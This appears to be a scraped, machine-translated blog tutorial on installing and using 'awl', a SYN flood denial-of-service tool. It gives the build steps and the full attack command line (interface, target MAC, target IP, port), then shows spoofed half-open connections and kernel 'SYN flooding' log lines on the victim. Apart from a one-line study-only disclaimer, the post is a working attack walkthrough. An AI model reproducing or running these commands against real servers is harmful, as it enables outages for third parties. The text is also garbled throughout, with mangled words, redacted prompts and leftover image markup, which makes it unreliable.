Download the package:
Wget
[email protected] ~]# LL
Total dosage 292
-rw-r--r--1 root root 296340 September 8 10:28 awl-0.2.tar_vhcfaewruq7s.gz
[Email protected] ~]# Tar XF awl-0.2.tar_vhcfaewruq7s.gz
[Email protected] ~]# CD awl-0.2
[[Email protected] awl-0.2]#
[[email protected] awl-0.2]#./configure && make&& make install
[Email protected] ~]# AW
Awk Awl
[Email protected] ~]# AW
The parameters are as follows:
-I sends the interface of the package, if omitted the default is Eth0
-M is attacked the MAC address of the machine, the program can not get the Mac according to the attack IP, need to be manually specified. Ping the target IP first, then arp-a. FF:FF:FF:FF:FF:FF if omitted
-d The IP of the attacked machine
-P is the port of the attacking machine.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Attacker:
[[Email Protected]an ~]# awl-i eth0-m 00:0c:29:39:ce:a4-d 192.168.1.218-p 80
Attacked by:
TCP 0 0 192.168.1.218:80 6.5.128.103:29105 syn_recv-
TCP 0 0 192.168.1.218:80 123.146.105.97:11200 syn_recv-
TCP 0 0 192.168.1.218:80 162.103.151.22:13540 syn_recv-
TCP 0 0 192.168.1.218:80 114.6.226.115:4986 syn_recv-
TCP 0 0 192.168.1.218:80 8.38.204.32:9703 syn_recv-
TCP 0 0 192.168.1.218:80 79.198.242.55:43912 syn_recv-
TCP 0 0 192.168.1.218:80 26.145.249.31:35158 syn_recv-
TCP 0 0 192.168.1.218:80 192.2.151.95:17551 syn_recv-
TCP 0 0 192.168.1.218:80 116.246.148.67:45865 syn_recv-
TCP 0 0 192.168.1.218:80 91.119.159.10:960 syn_recv-
TCP 0 0 192.168.1.218:80 81.0.9.64:39621 syn_recv-
TCP 0 0 192.168.1.218:80 167.18.151.54:43510 syn_recv-
TCP 0 0 192.168.1.218:80 210.94.41.57:53857 syn_recv-
TCP 0 0 192.168.1.218:80 51.126.4.52:53039 syn_recv-
650) this.width=650; "Src=" Http://s3.51cto.com/wyfs02/M00/87/00/wKioL1fRAZPyAMfyAAGoe9urPOQ651.png-wh_500x0-wm_3 -wmp_4-s_1424415113.png "title=" 1.png "alt=" Wkiol1frazpyamfyaagoe9urpoq651.png-wh_50 "/>
[Email protected] ~]# tail-f/var/log/messages
Feb 09:31:15 node3 yum[1432]: installed:apr-util-1.3.9-3.el6_0.1.x86_64
Feb 09:31:15 node3 yum[1432]: installed:apr-util-ldap-1.3.9-3.el6_0.1.x86_64
Feb 09:31:15 node3 yum[1432]: installed:httpd-tools-2.2.15-54.el6.centos.x86_64
Feb 09:31:15 node3 yum[1432]: Installed:mailcap-2.1.31-2.el6.noarch
Feb 09:31:19 node3 yum[1432]: installed:httpd-2.2.15-54.el6.centos.x86_64
Feb 09:37:07 node3 kernel:possible SYN flooding on port 80. Sending cookies.
Feb 09:38:07 node3 kernel:possible SYN flooding on port 80. Sending cookies.
Feb 09:39:56 node3 yum[1515]: installed:wget-1.12-8.el6.x86_64
Feb 09:55:26 node3 kernel:possible SYN flooding on port 80. Sending cookies.
Feb 09:58:05 node3 kernel:possible SYN flooding on port 80. Sending cookies.
Disclaimer: Just for personal study, please do not malicious attack other people's servers.
This article from the "[email protected]" blog, declined to reprint!
The awl of the SYN Flood tool is simple to use!